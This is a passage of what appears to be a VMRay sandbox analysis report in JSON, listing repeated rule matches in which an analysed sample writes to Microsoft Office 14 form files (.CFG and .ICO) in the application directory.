"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25464", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrespl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESPS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25471", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdresps.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25478", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrestl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDRESTS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25485", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\scdrests.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDCNCL.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25492", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\schdcncl.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREQ.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25499", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\schdreq.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESN.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25506", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresn.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDRESP.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25513", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\schdresp.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCHDREST.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25520", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\schdrest.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25527", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25534", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECRECS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25541", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\secrecs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURE.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25548", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\secure.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25555", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\securl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECURS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25562", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\securs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SHARING.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25569", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\sharing.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGN.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25576", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\sign.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25583", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\signl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SIGNS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25590", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\signs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25597", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25604", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25611", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25618", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\smss.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASK.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25625", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\task.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACC.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25632", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskacc.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25639", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25646", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25653", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25660", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDECS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25667", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdecs.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25674", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQ.CFG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25681", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreq.cfg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_25688", "ref_source": "glog", 